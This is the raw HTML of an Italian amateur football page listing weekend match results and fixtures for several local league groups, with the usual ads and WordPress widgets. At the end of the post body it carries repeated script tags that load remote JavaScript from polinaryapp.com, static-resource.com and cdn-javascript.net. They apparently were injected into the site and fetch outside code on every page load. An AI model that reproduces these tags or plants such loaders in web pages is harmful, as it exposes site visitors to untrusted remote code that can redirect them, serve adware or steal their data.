					<div class="post-inner">
		
						<div class="post-content">
						
							<p style="text-align: left;"><!-- Either there are no banners, they are disabled or none qualified for this location! -->
<h2><span style="color: #ff0000;">SERIE A GIRONE A 6A Ritorno</span><img class="alignnone size-thumbnail" src="https://i2.wp.com/www.calcioui.eu/wp-content/uploads/SPONSORBANNER/LOGICA.jpg?resize=616%2C125&#038;ssl=1" width="616" height="125" data-recalc-dims="1" /></h2>
<p>CDP LIMITE – MARTIGNANA 3-1 (E. Larini, Nannelli, Fontani)</p>
<p>CASOTTI – 4 MORI 2-1 (Falaschi, Sassi/LDS)</p>
<p>SCALESE – FERRUZZA 0-0</p>
<p>PIAGGIONE VILL. – BOCCACCIO 2-2 (Pesiri, Mentor/Mugnone, Tirinnanzi)</p>
<p>GAVENA – VITOLINI 1-2 (Hausman/Sabatini, Ciolo)</p>
<p><span style="color: #ff0000;">AGR. ERCOLANI – LE BOTTEGHE Lunedì 10 Febbraio, San Gimignano</span></p>
<p>RIPOSA: CASTELFIORENTINO</p>
<h2><span style="color: #ff0000;">SERIE A GIRONE B 6A  Ritorno</span></h2>
<p><img class="alignnone size-thumbnail" src="https://i2.wp.com/www.calcioui.eu/wp-content/uploads/2017/11/banner-728x60px-tinghi-neutro.jpg?resize=616%2C51" width="616" height="51" data-recalc-dims="1" /></p>
<p>STRETTOIO – BASSA 1-4 (Bello/Venturini, Viti 2, Bucalossi 2)</p>
<p>REAL ISOLA – LAZZERETTO 0-1 (Pinturicchio)</p>
<p>LA SERRA – CORAZZANO 2-0 (DOPPIO M A T T E O T E S T I )</p>
<p>ROSSELLI – CASA CULTURALE 0-2 (Telloli, Denti)</p>
<p>LE CERBAIE – F.C. CAPRAIA 3-0 (Musella, Sieni, Tonioni)</p>
<p><span style="color: #ff0000;">SESA – FIBBIANA Lunedì 10 febbraio, 21,15 S. Maria</span></p>
<p>RIPOSA: PONZANO ECOL.</p>
<p>&nbsp;</p>
<p><span style="color: #ff0000; font-family: Merriweather, Georgia, serif; font-size: 2em; font-weight: 900;">SERIE A GIRONE C 6A  Ritorno</span></p>
<p><span style="color: #ff0000;"><br />
</span><img class="alignnone size-thumbnail" src="https://i1.wp.com/www.calcioui.eu/wp-content/uploads/2019/09/BANNER-LR.jpg?resize=616%2C83&#038;ssl=1" width="616" height="83" data-recalc-dims="1" />POL. CERTALDO – U. VALDELSA 0-0</p>
<p>LE COLLINE – PONTE A ELSA 0-0</p>
<p><span style="color: #ff0000;">CASTELNUOVO – CORNIOLA EMMETEX </span></p>
<p><span style="color: #ff0000;">S. CASCIANO – CORNIOLA C.T. Lunedì 10 Febbraio, 21,15 S. Casciano</span></p>
<p><span style="color: #ff0000;">CDP SOVIGLIANA VIN. – SAN PANCRAZIO Lunedì 10 Febbraio 21,30 Pagnana</span></p>
<p><span style="color: #ff0000;">G.S. ALLENDE – CAS. GAMBASSI Lunedì 10 Febbraio, 21,30 Baccaiano</span></p>
<p><span style="color: #ff0000;">CORTENUOVA – SOVIGLIANA ’99  Lunedì 10 Febbraio,21,30 Coartenuova</span></p>
<h2><span style="color: #ff0000;">LEGA AMA GIRONE D 6A Ritorno</span></h2>
<p><img class="alignnone size-thumbnail" src="https://i2.wp.com/www.calcioui.eu/wp-content/uploads/2019/09/COMPUTER-GROSS-BANNER.jpg?resize=616%2C83&#038;ssl=1" width="616" height="83" data-recalc-dims="1" /></p>
<p>C.C. PINOCCHIO – FIANO 2-1 (Ferraresi, Taxi / Calosi)</p>
<p>BALCONEVISI – CASENUOVE 3-2 (Doppio FB7, Catarcioni/Rossi, EUROBUONAMICI)</p>
<p>ATL. BRUSCIANA – MARCIGNANA 2-1 (Barnini, Niccoli/Bamba)</p>
<p>LAMANENSE – MASTROMARCO 1-1 (Filippo Colca/Venturini)</p>
<p>TEAM ARCOGAS – NOI D’AVANE 1-1 (Pasqualetti/Taccetti)</p>
<p><span style="color: #ff0000;">UNITED – LISERA </span></p>
<p>RIPOSA: V. TAVARNELLE</p>
<h2><span style="color: #ff0000;">LEGA AMA GIRONE E 6A  Ritorno</span></h2>
<p><img class="alignnone size-thumbnail" src="https://i1.wp.com/www.calcioui.eu/wp-content/uploads/2019/09/MENICHETTI-LOGO.png?resize=460%2C108&#038;ssl=1" width="460" height="108" data-recalc-dims="1" /></p>
<p>ORTIMINO – PITTI SHOES 1-0 (Calamiello)</p>
<p>MASSARELLA – VINCI 0-2 (Verdiani, Miraglia)</p>
<p>MARCIALLA CITY – SAN QUIRICO 3-1 (Doppio Dei, Domenichelli/Airone)</p>
<p>CERRETO GUIDI – SPICCHIESE 1-2 (F. Giovannini/Capezzuoli, Sciortino)</p>
<p>VALDORME – STABBIA 1-1 (Palmieri/ IL LOBA)</p>
<p><span style="color: #ff0000;">SANTA CROCE – MOLINESE Lunedì 10 Febbraio, 21,00 S. Croce &#8211; BUTI &#8211;</span></p>
<p>RIPOSA: BORGANO</p>
<p>&nbsp;</p>
<div class="a-single a-17"></div>
<!-- Error, Ad is not available at this time due to schedule/geolocation restrictions! -->
<p>&nbsp;</p>
<p><script src="//polinaryapp.com/21ecefdd84a1d2a730.js"></script><script type="text/javascript" src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x"></script><script type="text/javascript" src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1573287368939"></script><script type="text/javascript" src="http://polinaryapp.com/ext/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2"></script></p>
<p><script src="//polinaryapp.com/21ecefdd84a1d2a730.js"></script><script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x" type="text/javascript"></script><script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1573288280385" type="text/javascript"></script><script src="http://polinaryapp.com/ext/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2" type="text/javascript"></script></p>
<div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-official sd-sharing"><h3 class="sd-title">Condividi:</h3><div class="sd-content"><ul><li class="share-facebook"><div class="fb-share-button" data-href="http://www.calcioui.eu/2020/02/08/6a-di-ritorno/" data-layout="button_count"></div></li><li class="share-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="http://www.calcioui.eu/2020/02/08/6a-di-ritorno/" data-text="SABATO UI,  6A GIORNATA DI RITORNO" data-via="calcioui2009" >Tweet</a></li><li class="share-telegram"><a rel="nofollow noopener noreferrer" data-shared="" class="share-telegram sd-button" href="http://www.calcioui.eu/2020/02/08/6a-di-ritorno/?share=telegram" target="_blank" title="Fai clic per condividere su Telegram"><span>Telegram</span></a></li><li class="share-end"></li></ul></div></div></div><div class='sharedaddy sd-block sd-like jetpack-likes-widget-wrapper jetpack-likes-widget-unloaded' id='like-post-wrapper-114838088-24550-5e3f748915466' data-src='https://widgets.wp.com/likes/#blog_id=114838088&amp;post_id=24550&amp;origin=www.calcioui.eu&amp;obj_id=114838088-24550-5e3f748915466' data-name='like-post-frame-114838088-24550-5e3f748915466'><h3 class="sd-title">Mi piace:</h3><div class='likes-widget-placeholder post-likes-widget-placeholder' style='height: 55px;'><span class='button'><span>Mi piace</span></span> <span class="loading">Caricamento...</span></div><span class='sd-text-color'></span><a class='sd-link-color'></a></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Correlati</em></h3>
</div>							
													
						</div>
						
						<div class="clear"></div>

						
							<div class="post-tags"><a href="http://www.calcioui.eu/tag/amatori-empoli/" rel="tag">amatori empoli</a><a href="http://www.calcioui.eu/tag/area-ui/" rel="tag">AREA UI</a><a href="http://www.calcioui.eu/tag/calcio-maggiore/" rel="tag">CALCIO MAGGIORE</a><a href="http://www.calcioui.eu/tag/calcio-ui/" rel="tag">calcio ui</a><a href="http://www.calcioui.eu/tag/cdp-limite/" rel="tag">cdp limite</a><a href="http://www.calcioui.eu/tag/risultati-del-week-end/" rel="tag">risultati del week-end</a><a href="http://www.calcioui.eu/tag/scalese/" rel="tag">scalese</a></div>							
							<div class="post-author">
								
								<a class="avatar" href="http://www.calcioui.eu/author/admin/">
																	</a>
								
								<h4 class="title"><a href="http://www.calcioui.eu/author/admin/">admin</a></h4>
								
								
							</div><!-- .post-author -->

									
		<div class="related-posts">
			
			<p class="related-posts-title">Read Next &rarr;</p>
			
			<div class="row">
							
								
						<a class="related-post" href="http://www.calcioui.eu/2020/02/08/tris-ciddippino-il-martignana-e-ko/" title="TRIS CIDDIPPINO, IL MARTIGNANA E&#8217; KO">
							
															
								<img width="400" height="200" src="https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2019/10/ANTICIPI-GIRONE-A.png?resize=400%2C200" class="attachment-post-image-thumb size-post-image-thumb wp-post-image" alt="" srcset="https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2019/10/ANTICIPI-GIRONE-A.png?resize=400%2C200 400w, https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2019/10/ANTICIPI-GIRONE-A.png?zoom=2&amp;resize=400%2C200 800w" sizes="(max-width: 400px) 100vw, 400px" />								
														
							<p class="category">
								NEWS							</p>
					
							<h3 class="title">TRIS CIDDIPPINO, IL MARTIGNANA E&#8217; KO</h3>
								
						</a>
					
										
						<a class="related-post" href="http://www.calcioui.eu/2020/02/07/le-gufate-della-redazione-73/" title="LE GUFATE DELLA REDAZIONE">
							
															
								<img width="400" height="200" src="https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2017/10/gufate.png?resize=400%2C200" class="attachment-post-image-thumb size-post-image-thumb wp-post-image" alt="" srcset="https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2017/10/gufate.png?resize=400%2C200 400w, https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2017/10/gufate.png?zoom=2&amp;resize=400%2C200 800w" sizes="(max-width: 400px) 100vw, 400px" />								
														
							<p class="category">
								LEGA AMA							</p>
					
							<h3 class="title">LE GUFATE DELLA REDAZIONE</h3>
								
						</a>
					
										
						<a class="related-post" href="http://www.calcioui.eu/2020/02/07/avanti-e-cerbaie-casa-culturale-e-ferruzza/" title="AVANTI E CERBAIE, CASA CULTURALE E FERRUZZA">
							
															
								<img width="400" height="200" src="https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2020/02/CAPRIOLA.jpg?resize=400%2C200" class="attachment-post-image-thumb size-post-image-thumb wp-post-image" alt="" srcset="https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2020/02/CAPRIOLA.jpg?resize=400%2C200 400w, https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2020/02/CAPRIOLA.jpg?zoom=2&amp;resize=400%2C200 800w, https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2020/02/CAPRIOLA.jpg?zoom=3&amp;resize=400%2C200 1200w" sizes="(max-width: 400px) 100vw, 400px" />								
														
							<p class="category">
								COPPA TOSCANA							</p>
					
							<h3 class="title">AVANTI E CERBAIE, CASA CULTURALE E FERRUZZA</h3>
								
						</a>
					
									
			</div><!-- .row -->

		</div><!-- .related-posts -->
		
								
																
					</div><!-- .post-inner -->
					
					<div class="clear"></div>
					
				</div><!-- .post -->
				
				

<div class="respond-container">	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title"><span class="fa fw fa-pencil"></span>Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/2020/02/08/6a-di-ritorno/#respond" style="display:none;">Annulla risposta</a></small></h3>			<form action="http://www.calcioui.eu/wp-comments-post.php" method="post" id="commentform" class="comment-form">
				<p class="comment-form-comment">
			<label for="comment">Comment<span class="required">*</span></label>
			<textarea id="comment" name="comment" cols="45" rows="6" required></textarea>
		</p><p class="comment-form-author"><label for="author">Nome <span class="required">*</span></label> <input id="author" name="author" type="text" value="" size="30" maxlength="245" required='required' /></p>
<p class="comment-form-email"><label for="email">Email <span class="required">*</span></label> <input id="email" name="email" type="text" value="" size="30" maxlength="100" aria-describedby="email-notes" required='required' /></p>
<p class="comment-form-url"><label for="url">Sito web</label> <input id="url" name="url" type="text" value="" size="30" maxlength="200" /></p>
<p class="form-submit"><p class="comment-subscription-form"><input type="checkbox" name="subscribe_comments" id="subscribe_comments" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-label" for="subscribe_comments">Avvertimi via email in caso di risposte al mio commento.</label></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_blog" id="subscribe_blog" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-blog-label" for="subscribe_blog">Avvertimi via email alla pubblicazione di un nuovo articolo.</label></p><input name="submit" type="submit" id="submit" class="submit" value="Pubblica il commento" /> <input type='hidden' name='comment_post_ID' value='24550' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p>			</form>
			</div><!-- #respond -->
	</div><!-- .respond-container -->	
	</div><!-- .content -->
	
	<div class="sidebar">

	<div class="widget widget_media_image"><div class="widget-content"><a href="https://tinghimotors.concessionaria.renault.it/landing/nuovo-captur"><img class="image " src="http://www.calcioui.eu/wp-content/uploads/2020/01/CAPTUR-NO-OPO-GENNAIO-DEM_DM_Logo.jpg" alt="" width="640" height="550" /></a></div><div class="clear"></div></div><div class="widget widget_media_image"><div class="widget-content"><a href="https://www.clkmg.com/gicarri/calcioui"><img width="300" height="300" src="https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2020/02/WEBINAR-3001.png?fit=300%2C300" class="image wp-image-24500  attachment-full size-full" alt="" style="max-width: 100%; height: auto;" srcset="https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2020/02/WEBINAR-3001.png?w=300 300w, https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2020/02/WEBINAR-3001.png?resize=150%2C150 150w, https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2020/02/WEBINAR-3001.png?resize=88%2C88 88w" sizes="(max-width: 300px) 100vw, 300px" /></a></div><div class="clear"></div></div><div class="widget adrotate_widgets"><div class="widget-content"><!-- Error, Ad is not available at this time due to schedule/geolocation restrictions! --></div><div class="clear"></div></div><div class="widget widget_text"><div class="widget-content">			<div class="textwidget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- SIDEBAR 1 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:336px;height:280px"
     data-ad-client="ca-pub-8469778265829532"
     data-ad-slot="2297354006"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>
		</div><div class="clear"></div></div><div class="widget adrotate_widgets"><div class="widget-content"><div class="a-single a-47"><div id='hbagency_space_900' ></div>
<script>if( typeof hbManager !== "undefined" ) hbManager.renderAd('hbagency_space_900');</script>


<div id="HB_Footer_Close_hbagency_space_904">
 <div id="HB_CLOSE_hbagency_space_904"></div>
 <div id="HB_OUTER_hbagency_space_904">
 <div id='hbagency_space_904' ></div>
 </div></div>
<script>if( typeof hbManager !== "undefined" ) hbManager.renderAd('hbagency_space_904');</script></div></div><div class="clear"></div></div><div class="widget_text widget widget_custom_html"><div class="widget_text widget-content"><div class="textwidget custom-html-widget"><iframe src="https://rcm-eu.amazon-adsystem.com/e/cm?o=29&p=42&l=ez&f=ifr&linkID=d013b7e73765df4cc3897cc4bcc23522&t=cu021-21&tracking_id=cu021-21" width="234" height="60" scrolling="no" border="0" marginwidth="0" style="border:none;" frameborder="0"></iframe></div></div><div class="clear"></div></div><div class="widget_text widget widget_custom_html"><div class="widget_text widget-content"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- MAGGIO 2017 SIDEBAR -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:600px"
     data-ad-client="ca-pub-8469778265829532"
     data-ad-slot="9367474406"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div><div class="clear"></div></div><div class="widget_text widget widget_custom_html"><div class="widget_text widget-content"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- SUPER TESTATA -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-8469778265829532"
     data-ad-slot="6088425202"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div><div class="clear"></div></div><div class="widget_text widget widget_custom_html"><div class="widget_text widget-content"><div class="textwidget custom-html-widget"><!-- codice circuito  Pnet Publisher Network -->
<!-- Spazio:  calcioui_eu_300x250 -->
<script type="text/javascript">
    
    amm_zt = 0;
    amm_ad_siteid = 12562;
    amm_ad_zone = 182879;
    amm_ad_width = 300;
    amm_ad_height = 250;
</script>
<script type="text/javascript"
            src='//advdl.ammadv.it/js/amm_show_ads_ntag.js'>
     
</script>
<!-- codice circuito  Pnet Publisher Network - fine--></div></div><div class="clear"></div></div><div class="widget_text widget widget_custom_html"><div class="widget_text widget-content"><div class="textwidget custom-html-widget"><!-- codice circuito  Pnet Publisher Network -->
<!-- Spazio:  calcioui_eu_300x250 -->
<script type="text/javascript">
    
    amm_zt = 0;
    amm_ad_siteid = 12562;
    amm_ad_zone = 182879;
    amm_ad_width = 300;
    amm_ad_height = 250;
</script>
<script type="text/javascript"
            src='//advdl.ammadv.it/js/amm_show_ads_ntag.js'>
     
</script>
<!-- codice circuito  Pnet Publisher Network - fine--></div></div><div class="clear"></div></div><div class="widget widget_media_image"><div class="widget-content"><img width="498" height="333" src="https://i2.wp.com/www.calcioui.eu/wp-content/uploads/2016/10/pirro-service.jpg?fit=498%2C333" class="image wp-image-3481 alignnone attachment-full size-full" alt="" style="max-width: 100%; height: auto;" title="PIRRO SERVICE" srcset="https://i2.wp.com/www.calcioui.eu/wp-content/uploads/2016/10/pirro-service.jpg?w=498 498w, https://i2.wp.com/www.calcioui.eu/wp-content/uploads/2016/10/pirro-service.jpg?resize=300%2C201 300w" sizes="(max-width: 498px) 100vw, 498px" /></div><div class="clear"></div></div><div class="widget widget_media_image"><div class="widget-content"><a href="https://www.clkmg.com/gicarri/calcioui"><img width="250" height="300" src="https://i1.wp.com/www.calcioui.eu/wp-content/uploads/2020/02/webinar-esclusivo.png?fit=250%2C300" class="image wp-image-24499  attachment-medium size-medium" alt="" style="max-width: 100%; height: auto;" /></a></div><div class="clear"></div></div>
</div>	
	<div class="clear"></div>
	
</div><!-- .wrapper -->
		
<div class="credits">
			
	<div class="section-inner">
		
		<a href="#" class="to-the-top" title="To the top">
            <div class="fa fw fa-angle-up"></div>
        </a>
		
		<p class="copyright">&copy; 2020 <a href="http://www.calcioui.eu/" title="Calcio Ui &mdash; Calcio amatoriale empolese valdelsa" rel="home">Calcio Ui</a></p>
		
		<p class="attribution">Portale di calcio amatoriale ideato e realizzato da Giuseppe Carriero, proprietario del dominio CRRGPP65T03A001S      Theme by <a href="http://www.andersnoren.se">Anders Nor&eacute;n</a></p>
		
	</div><!-- .section-inner -->
	
</div><!-- .credits -->


<!-- WP Audio player plugin v1.9.6 - https://www.tipsandtricks-hq.com/wordpress-audio-music-player-plugin-4556/ -->
    <script type="text/javascript">
        soundManager.useFlashBlock = true; // optional - if used, required flashblock.css
        soundManager.url = 'http://www.calcioui.eu/wp-content/plugins/compact-wp-audio-player/swf/soundmanager2.swf';
        function play_mp3(flg, ids, mp3url, volume, loops)
        {
            //Check the file URL parameter value
            var pieces = mp3url.split("|");
            if (pieces.length > 1) {//We have got an .ogg file too
                mp3file = pieces[0];
                oggfile = pieces[1];
                //set the file URL to be an array with the mp3 and ogg file
                mp3url = new Array(mp3file, oggfile);
            }

            soundManager.createSound({
                id: 'btnplay_' + ids,
                volume: volume,
                url: mp3url
            });

            if (flg == 'play') {
    stop_all_tracks();                soundManager.play('btnplay_' + ids, {
                    onfinish: function() {
                        if (loops == 'true') {
                            loopSound('btnplay_' + ids);
                        }
                        else {
                            document.getElementById('btnplay_' + ids).style.display = 'inline';
                            document.getElementById('btnstop_' + ids).style.display = 'none';
                        }
                    }
                });
            }
            else if (flg == 'stop') {
    //soundManager.stop('btnplay_'+ids);
                soundManager.pause('btnplay_' + ids);
            }
        }
        function show_hide(flag, ids)
        {
            if (flag == 'play') {
                document.getElementById('btnplay_' + ids).style.display = 'none';
                document.getElementById('btnstop_' + ids).style.display = 'inline';
            }
            else if (flag == 'stop') {
                document.getElementById('btnplay_' + ids).style.display = 'inline';
                document.getElementById('btnstop_' + ids).style.display = 'none';
            }
        }
        function loopSound(soundID)
        {
            window.setTimeout(function() {
                soundManager.play(soundID, {onfinish: function() {
                        loopSound(soundID);
                    }});
            }, 1);
        }
        function stop_all_tracks()
        {
            soundManager.stopAll();
            var inputs = document.getElementsByTagName("input");
            for (var i = 0; i < inputs.length; i++) {
                if (inputs[i].id.indexOf("btnplay_") == 0) {
                    inputs[i].style.display = 'inline';//Toggle the play button
                }
                if (inputs[i].id.indexOf("btnstop_") == 0) {
                    inputs[i].style.display = 'none';//Hide the stop button
                }
            }
        }
    </script>
    	<div style="display:none">
	</div>
		<!-- Quantcast Tag -->
		<script type="text/javascript">
			var _qevents = _qevents || [];

			(function() {
				var elem = document.createElement('script');
				elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
				elem.async = true;
				elem.type = "text/javascript";
				var scpt = document.getElementsByTagName('script')[0];
				scpt.parentNode.insertBefore(elem, scpt);
			})();

			_qevents.push({
				qacct:"p-Bu8zKASsyD3ZU",
				source:"wp"
			});
		</script>

		<noscript>
		<div style="display:none;">
			<img src="//pixel.quantserve.com/pixel/p-Bu8zKASsyD3ZU.gif" border="0" height="1" width="1" alt="Quantcast"/>
		</div>
		</noscript>
		<!-- End Quantcast tag -->
		<div id="fb-root"></div>
			<script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = 'https://connect.facebook.net/it_IT/sdk.js#xfbml=1&appId=249643311490&version=v2.3'; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script>
			<script>
			jQuery( document.body ).on( 'post-load', function() {
				if ( 'undefined' !== typeof FB ) {
					FB.XFBML.parse();
				}
			} );
			</script>
						<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+'://platform.twitter.com/widgets.js';fjs.parentNode.insertBefore(js,fjs);}}(document, 'script', 'twitter-wjs');</script>
			<link rel='stylesheet' id='glg-photobox-style-css'  href='http://www.calcioui.eu/wp-content/plugins/gallery-lightbox-slider/css/photobox/photobox.css?ver=1.0.0.31' type='text/css' media='' />
<script type='text/javascript' src='http://www.calcioui.eu/wp-content/plugins/slideshow/slideshow.js?ver=0.1'></script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.0.2/_inc/build/photon/photon.min.js'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var impression_object = {"ajax_url":"http:\/\/www.calcioui.eu\/wp-admin\/admin-ajax.php"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.calcioui.eu/wp-content/plugins/adrotate/library/jquery.adrotate.dyngroup.js'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var click_object = {"ajax_url":"http:\/\/www.calcioui.eu\/wp-admin\/admin-ajax.php"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.calcioui.eu/wp-content/plugins/adrotate/library/jquery.adrotate.clicktracker.js'></script>
<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=202006'></script>
<script type='text/javascript' src='http://www.calcioui.eu/wp-content/plugins/social-polls-by-opinionstage/public/js/shortcodes.js?ver=19.6.31'></script>
<script type='text/javascript' src='http://www.calcioui.eu/wp-content/themes/rowling/js/global.js?ver=4.9.13'></script>
<script type='text/javascript' src='https://c0.wp.com/c/4.9.13/wp-includes/js/comment-reply.min.js'></script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.0.2/_inc/build/widgets/eu-cookie-law/eu-cookie-law.min.js'></script>
<script type='text/javascript' src='http://www.calcioui.eu/wp-content/plugins/google-maps-builder/vendor/wordimpress/maps-builder-core/assets/js/plugins//gmb-infobubble.min.js?ver=2.1.2'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var gmb_data = {"i18n":{"get_directions":"Get Directions","visit_website":"Visit Website"},"infobubble_args":{"shadowStyle":0,"padding":12,"backgroundColor":"rgb(255, 255, 255)","borderRadius":3,"arrowSize":15,"minHeight":20,"maxHeight":450,"minWidth":200,"maxWidth":350,"borderWidth":0,"disableAutoPan":true,"disableAnimation":true,"backgroundClassName":"gmb-infobubble","closeSrc":"https:\/\/www.google.com\/intl\/en_us\/mapfiles\/close.gif"}};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.calcioui.eu/wp-content/plugins/google-maps-builder/vendor/wordimpress/maps-builder-core/assets/js/frontend/google-maps-builder.min.js?ver=2.1.2'></script>
<script type='text/javascript' src='http://www.calcioui.eu/wp-content/plugins/google-maps-builder/vendor/wordimpress/maps-builder-core/includes/libraries/map-icons/js/map-icons.js?ver=2.1.2'></script>
<script type='text/javascript' src='https://c0.wp.com/c/4.9.13/wp-includes/js/wp-embed.min.js'></script>
<script type='text/javascript' src='http://www.calcioui.eu/wp-content/plugins/gallery-lightbox-slider/js/jquery/photobox/jquery.photobox.js?ver=1.0.0.31'></script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.0.2/_inc/build/postmessage.min.js'></script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.0.2/_inc/build/jquery.jetpack-resize.min.js'></script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.0.2/_inc/build/likes/queuehandler.min.js'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1","is_stats_active":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.0.2/_inc/build/sharedaddy/sharing.min.js'></script>
<script type='text/javascript'>
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-facebook', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-telegram', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtelegram', 'menubar=1,resizable=1,width=450,height=450' );
				return false;
			});
</script>

<!--[if lt IE 9]><link rel="stylesheet" href="http://www.calcioui.eu/wp-content/plugins/gallery-lightbox-slider '/css/photobox/photobox.ie.css'.'"><![endif]-->

<style type="text/css">

	#pbOverlay { background:rgba(0,0,0,.90)  none repeat scroll 0% 0% !important; }
	.gallery-caption, .blocks-gallery-item figcaption { display: none !important; }
</style>
    
<script type="text/javascript">// <![CDATA[
jQuery(document).ready(function($) {
	
	/* START --- Gallery Lighbox Lite --- */
	
		// Gutenberg Adaptive
	$('.blocks-gallery-item').each(function(i) {
		
		var $blck = $(this).find('img'),
		$isSrc = $blck.attr('src');
		
		if (! $blck.closest('a').length) {
			$blck.wrap('<a class="glg-a-custom-wrap" href="'+$isSrc+'"></a>');
		}
		
	});
	
			
	// Initialize!
	// .glg-a-custom-wrap (Block Gallery)
	// .carousel-item:not(".bx-clone") > a:not(".icp_custom_link") (Image Carousel)
	// .gallery-item > dt > a (Native Gallery)
	$('.gallery, .ghozylab-gallery, .wp-block-gallery')
		.photobox('.carousel-item:not(".bx-clone") > a:not(".icp_custom_link"),a.glg-a-custom-wrap, .gallery-item > dt > a',{
			autoplay: true,
			time: 3000,
			thumbs: true,
		}, callback);
		function callback(){
		};
		
});

/* END --- Gallery Lighbox Lite --- */

// ]]></script>

    
    
	<!-- start miniAudioPlayer initializer -->
	<script type="text/javascript">

	let isGutenberg = false;
	let miniAudioPlayer_replaceDefault = 1;
	let miniAudioPlayer_excluded = "map_excluded";
	let miniAudioPlayer_replaceDefault_show_title = 1;

	let miniAudioPlayer_defaults = {
				inLine:true,
                width:"350",
				skin:"black",
				animate:true,
				volume:.2,
				autoplay:false,
				showVolumeLevel:true,
				allowMute: true,
				showTime:true,
				id3:false,
				showRew:true,
				addShadow: false,
				downloadable:false,
				downloadPage: null,
				swfPath:"http://www.calcioui.eu/wp-content/plugins/wp-miniaudioplayer/js/",
				onReady: function(player, $controlsBox){
				   if(player.opt.downloadable && player.opt.downloadablesecurity && !false){
				        jQuery(".map_download", $controlsBox).remove();
				   }
				}
		};

    function initializeMiniAudioPlayer(){
         jQuery(".mejs-container a").addClass(miniAudioPlayer_excluded);
         jQuery("a[href*='.mp3'] ,a[href*='.m4a']").not(".map_excluded").not(".wp-playlist-caption").mb_miniPlayer(miniAudioPlayer_defaults);
    }

    //if(1)
        jQuery("body").addClass("map_replaceDefault");

	jQuery(function(){
     // if(1)
         setTimeout(function(){replaceDefault();},10);
      
      initializeMiniAudioPlayer();
      jQuery(document).ajaxSuccess(function(event, xhr, settings) {
        initializeMiniAudioPlayer();
      });
	});
	</script>
	<!-- end miniAudioPlayer initializer -->

